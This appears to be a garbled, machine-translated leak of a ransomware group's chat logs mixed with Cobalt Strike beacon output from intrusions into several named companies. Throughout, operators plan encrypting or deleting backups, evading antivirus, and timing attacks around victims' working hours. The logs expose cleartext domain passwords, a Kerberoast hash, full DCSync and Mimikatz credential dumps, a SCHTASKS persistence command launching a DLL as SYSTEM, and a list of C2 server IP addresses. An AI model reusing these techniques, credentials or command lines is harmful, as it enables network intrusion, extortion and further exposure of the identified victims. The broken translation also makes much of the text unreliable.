This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted, VM files are 20% encrypted regardless of the value of the parameter.
``[ ](https://mediaeveryone.com/group/gophersport-com?msg=AGh5J9zT3mu5jWym3) aha can you write to him in the course[ ](https://mediaeveryone.com/group/gophersport-com?msg=Jxbh8z9YRoGiBPS8y) @tl2 can he know? I have doubts for 6 hours ``Shares for 10.2.1.21:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		RAID1 ServerHD SSDRAID2 TIF Archive Web schtask
I don't know the principle [ ](https://mediaeveryone.com/group/gophersport-com?msg=GeZ52s9MFa6iZRmSy) there's at least one of us [ ](https://mediaeveryone.com/group/gophersport-com?msg=Fr5YK8iryrRrbKw4S) I think it depends on the power of the environment where you run it, but I don't really know what's going on there, you have two large drives, you have two metrics, what was the slider like 40 percent when I looked through the goo, isn't the build probably not fully encrypting large files?
 Volume in drive L is DRnetapp02a
 Volume Serial Number is 802E-2DBA

 Directory of l:\

06/08/2020 03:53 PM <DIR> Backups
04/22/2016 10:00 AM <DIR> VeeamWAN
               0 File(s) 0 bytes
               2 Dir(s) 2,537,787,944,960 bytes free

``Well hhhh2tb)``
[+] received output:
 Volume in drive L is DRnetapp01a
 Volume Serial Number is AA21-9C34

 Directory of L:\

06/09/2020 09:00 PM <DIR> Backups
05/09/2019 01:49 PM <DIR> ProgramData
10/24/2016 08:24 AM <DIR> VeeamWAN
               0 File(s) 0 bytes
               3 Dir(s) 2,094,574,211,072 bytes free

``or what's the metric there dir Z:\yeah, let's not fuck it up before closing time)`` I don't remember, I'll go look on rdp+? How much disk volume is there? I think in 6 hours you can touch a shitload of files in general6 hours for the whole process is even betterThat current time is: 9:50:34 at 11a.m.no39 give me the time again from there like in our 11 p.m. they will have 11 p.m. or something so backups will have to start early tomorrow morning if that's the case the server check to avmozhet it ... well I think even windef cut before starting most likely they will only have sessions the rest in mapvot look how many without avmov) `[+] No EDR products found! Operate at your own risk!`edr look there where triednu. i remember. it fell off today just because i myself dragged it)) hmm, print dragged it try itthere is a server therez1print then - does not work with two dll with the flag stay? and dll check it out so we continue to look) you have a chance to check everything because tomorrow will not have time for this) not the fact that there isa here hz. i think it viam stores there. and gpervisors do not see them at all we get virtualization stores snapshots on that drive? to check that it works to start with 1-2 servers in the coba through the dlle with it you could close 2 there is another network on the way not just sit and wait would have to wait until 2-3 am) they have 9 am, just started a working day)also an optiondao, then tomorrow morning and we will start?)there is no way) fuck it again at night to close? if we start under the noses of the admins they just reboot everything and the drive on the over a dozen gb not even half-encrypted we will not start now anyway they have a working day closer to the beginning of the issuing build? better in the cipher locally rebuild exactly working versiondavay shelkodma in oldkoba 4.2 started? or are you working in the old one? or even through a VPN? of course not 100% sure, but it looks like a disk connected to the wiame-oan.[ ](https://mediaeveryone.com/group/gophersport-com?msg=zs9ACCiTbycvsjNsy) if there is third party information, it is not worth trying there is a suggestion to format and defragment the whole disk are backups? the current time is: 9:11:35.49 tell me more time there
then in the encryption which OS disks were lying where again? but such a volume will be long encrypted at all so i think it is better to encrypt, and deleted can be restored of course) we have access to this disk? there is an interesting system - there is such a thing called veeam one. I climbed into its admin panel, looked at what's up and found two servers with disk D (conditionally) connected to a gigabyte and there are backups[ ](https://mediaeveryone.com/group/gophersport-com?msg=eYeeFtaRDpCZgE3Qy) scanners do not sleep) and where do they lie? backups of virtualisks we found, but what's better to delete them, or to encrypt? in msfvpska also seems to be fallen into the wrong place, constantly flying out and falling off in my new kobu nothing at all does not fly)but I'll probably give 3 kobu for 4.2 solve the question may be kobu fallen - so ... well Trendmicro not so biting and another thing) `[+] Trend Micro Inc Found!I can't go to any of the armies...and edr_query, what does it say? Maybe it'll let me through to the new kobs...I don't know what's on the armies, it's cutting sessions off[ ](https://mediaeveryone.com/group/gophersport-com?msg=A5hdqvaiMJhC3JSm2) oh, yeah[ ](https://mediaeveryone.com/group/gophersport-com?msg=dD7JqrCAaEKriCqkx) really? Did the sharpshooter work?
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard



User: erictitchenal - IP Address: 10.22.0.10 (r90sflx3)

User: mattpeterson - IP Address: 10.22.0.13 10.10.0.54 (itvm1) (z1ftp)
``````
gophersport.local\schtask rehpog2013!

gophersport.local\symbackup rehpog2013!

gophersport.local\veeambackup rehpog2013!

gophersport.local\veeamone KA7KYbbmDC5LMmMn
Go to @user4 in the meantime, then check the settings on the list we've done so yeah, it's not working, sessions are dropping out I was starting you that way so throw it in the dllchet no sessions from user4 and you can't backup a session for @user9 like I did? I'm gonna go check the time, there are no more ready 23.106.160.195 mine)
CobaltStrike C2s on Port 443 - Pastebin.com
pastebin.com ' ...
34.233.187.38. 54.74.109.48. 209.159.207.46. 197.248.104.2. 152.160.171.27. 98.143.95.83. 64.139.73.173. 23.106.160.195. 205.201.245.170. 201.35.17.221.
``Maybe give me, too, and then also 20 percent attractslno 4.2 there is a 4.2?
My apparently lit up, do not fly sessions9 + otpingoval servaks and armas. Found backups. AD can not take the perspiration, even on the DK, but there, mostly nothing has changed. Remains to find out what's virtualization, sort servos and can close - so order the build, maybe today and will close, there are already ready for the next stage) ta I already removed the disink) here I have a skull admin skul
there stoverthere will be YES somewhere on the shul servaketut already gone beyond the point of entry and well the more you gather up a pool of work for later the better, until the grid is dismantled to the state dama will not close ``.
kbhost2.korbel.com ESXI 5.5
kbhost1.korbel.com ESXI 5.5
colohost2.korbel.com ESXI 5.5
kbhost3.korbel.com ESXI 5.5
colohost1.korbel.com ESXI 5.5
kb-hqucs1.korbel.com Virtual Host Servers
vcenter.korbel.com VCENTER
``+ av[ ](https://mediaeveryone.com/group/korbel-com?msg=xkdmqByZWcpbzcnan) yes I'll look for the sphere creeds
$krb5tgs$23$sqladmin$korbel.com$MSSQLSvc/cognos2.korbel.com:1433$D6DDE7C0F99FCB13756285792EDA8ED3$19E792F0EFBA2B8C610528E69BD9AC8C6B08DB6328CFEF7727663276554C5A684D19AFFAE9B504DE89A500C8568987D17416CAECE119DF76ED6015480C3134042282134DFD9DBE2269F4C51C145BF58959A9C196A7F7737E70A867E6CA31E86812D44A7B392C007498BF83C3A34CF51C33B8D2900FA269B407C517E1FA4CC6FA474CE5F7E1CE0FA181B3BEECB1AC8C4740FF1044DAF8D6B2F2E7B2B13E2F4ED3B56F2118C0ABDDE393975F88FA099737CAC9021F3F1455BB3820A24317338774BD191F20DAD739A69387EEE72CD8451595303892DE8A0E2E9CFE7846330968B348D71737E272259EAF26737D536AC4A7B1021F0D9C8B3AE69EB27877311E4AB605876769263CC627649BA885B37A08A52FDD5D69040AEAAADB4E0B16C6A263666A72248B47C404855C874563A837BDAB7AF4C7066F6DCDA99D46A77EA9F5B228ABCAA100B33950CBD38C84EEA836362694C9D5DA0D06C134C1567AE79F0AF813D8564050EB083600D01E94453FC93E50CFFB13FC9E90B312EA43EC36C0F81D54B6F79B9B41D994AB38F8A1D1390F1C370EC2CF01089FBCEF031302F0AD3A9078636E158BF7F70FD51B796713A8F1704A545DB5B0629CFBFF9F314279A31E615281DFFCB70504379F0BD7792DA8940B222E9662AA32D245218C05A038D930BFB093D6A18D6A22BE91571EF775E74rfvbgt5

Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft SvcRestartTask#23731 12/21/2020 12:56:24 PM Ready
``Did you do it?'') and the stack under the systemmask under the canonical name in the system32 hide the old dll delete this stack on that machinedid you also flash on the server just swam the head, disassemble the stack from the userdir under the userdir that is delete the stack
Microsoft autoupdate#94110
``Is``.
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready

The ``dll start with the rundle and create the taska itself''.
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready

Folder: \Microsoft
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Configuration Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Configuration Manager Health Evaluation 12/22/2020 12:09:37 AM Ready

Folder: \Microsoft\Microsoft Antimalware
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft Antimalware Scheduled Scan 12/26/2020 2:00:12 AM Ready

Folder: \Microsoft\Office
TaskName Next Run Time Status
======================================== ====================== ===============
Office 15 Subscription Heartbeat 12/22/2020 6:33:22 AM Could not start

Folder: \Microsoft\Windows
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management Disabled
AD RMS Rights Policy Template Management N/A Ready

Folder: \Microsoft\Windows\AppID
TaskName Next Run Time Status
======================================== ====================== ===============
PolicyConverter N/A Ready
VerifiedPublisherCertStoreCheck N/A Ready

Folder: \Microsoft\Windows\Application Experience
TaskName Next Run Time Status
======================================== ====================== ===============
AitAgent 12/22/2020 2:30:00 AM Ready
ProgramDataUpdater 12/22/2020 12:30:00 AM Ready

Folder: \Microsoft\Windows\Autochk
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready

Folder: \Microsoft\Windows\CertificateServicesClient
TaskName Next Run Time Status
======================================== ====================== ===============
SystemTask N/A Ready
UserTask N/A Ready
UserTask-Roam Disabled

Folder: \Microsoft\Windows\Customer Experience Improvement Program
TaskName Next Run Time Status
======================================== ====================== ===============
Consolidator 12/21/2020 6:00:00 PM Could not start
KernelCeipTask 12/24/2020 3:30:00 AM Ready
UsbCeip 12/24/2020 1:30:00 AM Ready

Folder: \Microsoft\Windows\Customer Experience Improvement Program\Server
TaskName Next Run Time Status
======================================== ====================== ===============
ServerCeipAssistant 12/22/2020 1:56:36 PM Could not start
ServerRoleCollector 12/24/2020 12:54:11 AM Ready
ServerRoleUsageCollector 12/22/2020 7:21:00 PM Could not start

Folder: \Microsoft\Windows\Defrag
TaskName Next Run Time Status
======================================== ====================== ===============
ScheduledDefrag 12/23/2020 2:29:46 AM Ready

Folder: \Microsoft\Windows\MemoryDiagnostic
TaskName Next Run Time Status
======================================== ====================== ===============
CorruptionDetector N/A Ready
DecompressionFailureDetector N/A Ready

Folder: \Microsoft\Windows\MUI
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready

Folder: \Microsoft\Windows\Multimedia
TaskName Next Run Time Status
======================================== ====================== ===============
SystemSoundsService Disabled

Folder: \Microsoft\Windows\NetTrace
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready

Folder: \Microsoft\Windows\PLA
TaskName Next Run Time Status
======================================== ====================== ===============
Server Manager Performance Monitor Disabled

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName Next Run Time Status
======================================== ====================== ===============
AnalyzeSystem 12/29/2020 10:09:27 AM Ready

Folder: \Microsoft\Windows\RAC
TaskName Next Run Time Status
======================================== ====================== ===============
RacTask 12/21/2020 1:08:29 PM Ready

Folder: \Microsoft\Windows\Ras
TaskName Next Run Time Status
======================================== ====================== ===============
MobilityManager N/A Ready

Folder: \Microsoft\Windows\Registry
TaskName Next Run Time Status
======================================== ====================== ===============
RegIdleBackup 12/23/2020 12:22:55 AM Ready

Folder: \Microsoft\Windows\Server Manager
TaskName Next Run Time Status
======================================== ====================== ===============
CleanupOldPerfLogs N/A Ready
ServerManager N/A Ready

Folder: \Microsoft\Windows\SoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 8:51:55 PM Ready

Folder: \Microsoft\Windows\Task Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Daily Transformer Cube Builds Disabled
Interactive N/A Ready

Folder: \Microsoft\Windows\Tcpip
TaskName Next Run Time Status
======================================== ====================== ===============
IpAddressConflict1 N/A Ready
IpAddressConflict2 N/A Ready

Folder: \Microsoft\Windows\TextServicesFramework
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready

Folder: \Microsoft\Windows\Time Synchronization
TaskName Next Run Time Status
======================================== ====================== ===============
SynchronizeTime 12/27/2020 1:00:00 AM Ready

Folder: \Microsoft\Windows\UPnP
TaskName Next Run Time Status
======================================== ====================== ===============
UPnPHostConfig N/A Ready

Folder: \Microsoft\Windows\User Profile Service
TaskName Next Run Time Status
======================================== ====================== ===============
HiveUploadTask Disabled

Folder: \Microsoft\Windows\WDI
TaskName Next Run Time Status
======================================== ====================== ===============
ResolutionHost N/A Ready

Folder: \Microsoft\Windows\Windows Error Reporting
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting N/A Ready

Folder: \Microsoft\Windows\Windows Filtering Platform
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready

Folder: \Microsoft\Windows\WindowsColorSystem
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader Disabled

Folder: \Microsoft\Windows\Wininet
TaskName Next Run Time Status
======================================== ====================== ===============
CacheTask N/A Ready

Folder: \OfficeSoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 11:19:45 PM Ready

Folder: \Scheduled Server Reboots
TaskName Next Run Time Status
======================================== ====================== ===============
Reboot (on demand) N/A Ready
Scheduled Server Reboot 12/27/2020 9:45:00 PM Ready

Folder: \Symantec Endpoint Protection
TaskName Next Run Time Status
======================================== ====================== ===============
Symantec Endpoint Protection Error Analysis N/A Ready
Symantec Endpoint Protection Error Proce 12/22/2020 2:47:08 AM Could not start

show me the fucking stask on that machine already) you can't run it more than once you almost fucked up the system already told 1 dll = 1 run already fuckin' time just like you told the dll[ ](https://mediaeveryone.com/group/korbel-com?msg=BLQrQThiQ9uSkH3W9) ??? run the stask what the fuck are you doing one minute
beacon> shell SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[*] Tasked beacon to run: SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[+] host called home, sent: 211 bytes
[+] received output:
ERROR: Invalid syntax. Cannot specify user name without specifying system name.
Type "SCHTASKS /?" for usage.

``Cook what 15 minutes? That's not fast as shit!`` Fix it, it's a fucking bug (that's what the fuck is this...see what the fuck is this? You run it in system32 and you run it on the server, you fuckin' check it
```
C:\Users\cognos\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt01.dll
``x64x64security dll, jump to the server, and backdoor there.``Yes.
```
	 * Username : daniel.harvey_adm
	 * Domain : KORBEL
	 * Password : W3lcome?

	 * Username : adaudit
	 * Domain : korbel
	 * Password : #aud1T#

	 * Username : ben.mandeville
	 * Domain : KORBEL
	 * Password : 1234qwerASDF!@#$
``Balls see right away``
maybe the current username can't do anything.
The request will be processed at a domain controller for domain korbel.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
adaudit agpm_admin barry.levine_adm
ben.mandeville ben.mandeville_adm carol.macdonell_adm
daniel.harvey daniel.harvey_adm dcbackup
Honcho Jcomfort josue.gonzalez
josue.gonzalez_adm kbveeamadmin KB-WMI-Monitor
panuserID Russell.Bartson_adm SMSadmin
SMTP-Relay solarwindows SolarWinds-LDAP
sqlbackup switchscan tracy.mcmahan_adm
vcentersvc veeamadmin
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain korbel.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
adaudit carol.macdonell_adm daniel.harvey_adm
Honcho josue.gonzalez_adm Russell.Bartson_adm
SMSadmin SMTP-Relay sqlbackup
vcentersvc
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain korbel.com.

Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
carol.macdonell
ContentSubmitters
Domain Admins
Enterprise Admins
Honcho
josue.gonzalez
SMTP-Relay
Tmcmahan
tracy.mcmahan_adm
The command completed successfully.

``That's it for now, leave it for now, is there anything else to dig or go help? I'm telling you, just live, that's all``.
beacon> portscan 10.1.10.0/16 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.1.10.0/16
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.1.10.20' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.1' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.11' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.59' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.100' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.103' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.104' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.210' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.251' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.240' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.250' is alive. [read 8 bytes]
``portscan by /16 masks stupid question - how?
no one in the office, no one gave an answer check if there are vorkgroups near us, they are pure live under 16 and that's it we had a 2416 mask what? yesterday I do not remember it, put port scan to /16 maskwon dtsinkwon tell me what to do now ``
_-_-_-_-_-_-_-_-_-_-_-_-_-_--> [+] INSTALLED SOFTWARE <-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Some weird software? Check for vulnerabilities in unknowable software installed
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
7-Zip
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft Office
Microsoft Office 15
Microsoft.NET
ModifiableWindowsApps
ossec-agent
Teams Installer
UNP
Velociraptor
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
    InstallLocation REG_SZ C:\Program Files\7-Zip\
    InstallLocation REG_SZ C:\Program Files (x86)\Microsoft Office

I started it up and then I remembered that there is no chrome there sharpweb by the way it doesn't take off chrome unfortunately
chrome via sharptchrome or mimicom before I did it without[ ](https://mediaeveryone.com/group/northerntrust-local?msg=GyqZZyrCNNsa7vude) ``
10.1.10.11:445 (platform: 500 version: 10.0 name: LENDING3 domain: NORTHERNTRUST)
10.1.10.20:445 (platform: 500 version: 10.0 name: FILE1 domain: NORTHERNTRUST)
10.1.10.59:445 (platform: 500 version: 10.0 name: ACC1 domain: NORTHERNTRUST)
10.1.10.100:445 (platform: 500 version: 10.0 name: HR1 domain: NORTHERNTRUST)
10.1.10.103:445 (platform: 500 version: 10.0 name: IT1 domain: NORTHERNTRUST)
10.1.10.104:445 (platform: 500 version: 10.0 name: LENDING1 domain: NORTHERNTRUST)
10.1.10.210:445 (platform: 500 version: 10.0 name: AUTOMATE1 domain: NORTHERNTRUST)
10.1.10.240:445 (platform: 500 version: 6.3 name: BACKUP1 domain: NORTHERNTRUST)
10.1.10.250:445 (platform: 500 version: 6.3 name: DC1 domain: NORTHERNTRUST)
10.1.10.251:445 (platform: 500 version: 10.0 name: DC3 domain: NORTHERNTRUST)
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (All Users) ===



=== Checking for Firefox (All Users) ===



=== Checking Windows Vaults ===


``and give me a dump of the browser from the pc where it started without ``icmp 1024`` I have a portscan short for 445 at all? There's one subnet 10.1.10.0vmemt) for 443 like yesterday? make the dump from your trastdump I do not see so, now parsing netvorak, it turns out?
Here's all the servers from ad_computer
```
DC1.Northerntrust.local
DC3.Northerntrust.local
Automate1.Northerntrust.local
Backup1.Northerntrust.local
File1.Northerntrust.local
``[ ](https://mediaeveryone.com/group/northerntrust-local?msg=Z759CRfjaC2xtFvXv) did what I know?
\Administrator:Abcd1234!'' Administrator
``I got a session on dc@tl1 eun
[DC] 'Northerntrust.local' will be the domain
[DC] 'DC1.Northerntrust.local' will be the DC server
[DC] Exporting domain 'Northerntrust.local'
502 krbtgt 3dbe670716ca04f747c58e2410985c37 514
2107 rperkins 25c1c24f244b438bddd008f5e5e04dc5 512
2109 darmstrong dcd25a439cd39daa6baeb6c02e88a9e6 512
2110 pgardner 1b638783b0af77e01bcb54fac1c9e938 512
2113 vlane ae67ca4ce0dd712cf628575c9439651d 512
2114 jwalsh 0ea6bede65067837ca818ac7381b9ac9 512
2116 lbrewer e04b29f420b76b1de7405d42db33296e 512
2123 PRINTER1$ d71638bf9374e98d9bedc6b6c32de6fb 4128
2124 PRINTER2$ 9b3c84a8ab5f5e10fa062bb7b89dc3f0 4128
2125 HR3$ a88292f68cd62e0dff57c5edbdfad160 4128
2128 IT2$ 51de61363b4c3e0c3bc9dbf394b834ee 4128
2129 IT3$ eeb1b544374ad054be4c3a37f2409f46 4128
2132 security 55e9dd76e1b4c8cdef934988600ad2b4 66048
2133 MARKET1$ 78690dbb6c0526d278300c76bdf40c6d 4128
2134 MARKET2$ 5c6a44e156b5633fbc5822ce8cc3bfa9 4128
2135 MARKET3$ cd4a3826128079306a570a83fb359318 4128
2122 networkservices 774ec9de93bc164d7e7dd3f7022b9ddf 66048
2106 spayne ec4408935ee4d46b9c4093947015c410 512
2136 srivers c4b0e1b10c7ce2c4723b4e2407ef81a2 512
2137 boniel 33a09024bd0389b1ced865a291d0199c 512
2104 ghawkins acbfc03df96e93cf7294a01a6abbda33 66048
2138 LENDING4$ 6c13631c0d6b31fd187f4711fe223620 4096
1105 AUTOMATE1$ 82d4822fd7edb2932db2525042d23ad6 4096
1104 DC3$ 0d24da494b1f4f15f4e6a79444e70f90 532480
1106 HR1$ 3c3ed7115e70468341b2f545d5d44639 4096
1109 LENDING1$ a934860dbc89364c28c4d2ada48dc792 4096
2102 IT1$ 6db2362e97d455705f3fdd235382ee14 4096
1107 ACC1$ 0d944ee41ec7b7fb57e41811519010d7 4096
2130 FILE1$ a488233c032861f97e34ba50b73b99fd 4096
1001 DC1$ 54c071b65d14c02a3f3ffc638b16c8b5 532480
1108 BACKUP1$ 2e2060b3b2eb7a0b61dcbf918ee498ac 4096
2127 LENDING3$ 102434085c8a288797aec02654f619e3 4128
2126 LENDING2$ 3c507247472925acf99b8c1fe532a645 4128
2105 ehart cef2eb521883d390b32b0b5bb916f7bb 66048
500 Administrator e20e81c5c06ccf288474c581f13423b9 512
2103 rbradley 64f12cddaa88057e06a81b54e73b949b 66048
3602 fgarbo 1d32ad40cecbc0419f99a08e0845dd66 66048
``You have 6 people, there are all the guides, do as you know it`` I got it, in the hostlist parameter? in the sharfinderev hostlist then? specify dc? or ...? not by hostlist there is a parameter in the sources, but it did not work with it also look at the git, maybe there is a parameter directly specified domain ``
beacon> psinject 1636 x64 Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt
[*] Tasked beacon to psinject: Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt into 1636 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!

The ``argument is missing``.
beacon> psinject 1636 x64 Invoke-ShareFinder | Out-File sharfindINFO.txt
``what was the command to say xx on this error didn't ask tl what are the answers?
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
Northerntrust.local
``Check the domain, maybe it was not disconnected from the domain likeShareFinder ran it, it rolled out, I guess there is no orbs :thinking:
```
[*] Tasked beacon to remove C:\Windows\Temp\wpinfo
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!
``You have everything) you have guides, you have a forum, you have a mindmapa when he ran out of ideas to me it's time to ask your teammate) brut? eh? eh? I ran out of ideas I found the disk D, not openShuTkUya PrIkolYNu not get it, not the staff, right? you already took it off so there is something to work with tokei do token remove adda here and brute-force does not make sense until there is no DAKEY local users plus throw in the brute-force will make sense? well xd I wrote after I did not fall off the credits besides the current polozak?[ ](https://mediaeveryone.com/group/northerntrust-local?msg=swYfpm9XBJ7NGMKpu) ?most likely the system accts are local users in ad_users no :thinking:+dynamic passwords ``
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
``````
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::Abcd1234!
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ae49429db3a99d5b0af02187c1873deb:::

``I need a hint on vectors, no credits fell to me except for the ntlm hash of the current user, he is on his LA car, but there is little useful
his car is in OU=Lending
there are more of these cars, it makes sense to ping them and brutalize on the subject of LA?
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DC1 10.1.10.250
 DC3 10.1.10.251
``````
Authentication Id : 0 ; 49752863 (00000000:02f72b1f)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
	msv :
	 [00000003] Primary
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * NTLM : 1d32ad40cecbc0419f99a08e0845dd66
	 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
	 * DPAPI : 532039ed13c7c6b6d3b3986a446888e4
	tspkg :
	wdigest :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 49752778 (00000000:02f72aca)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
	msv :
	 [00000003] Primary
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * NTLM : 1d32ad40cecbc0419f99a08e0845dd66
	 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
	 * DPAPI : 532039ed13c7c6b6d3b3986a446888e4
	tspkg :
	wdigest :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 49665170 (00000000:02f5d492)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-90-0-2
	msv :
	 [00000003] Primary
	 * Primary : Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id : 0 ; 49665147 (00000000:02f5d47b)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-90-0-2
	msv :
	 [00000003] Primary
	 * Primary : Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
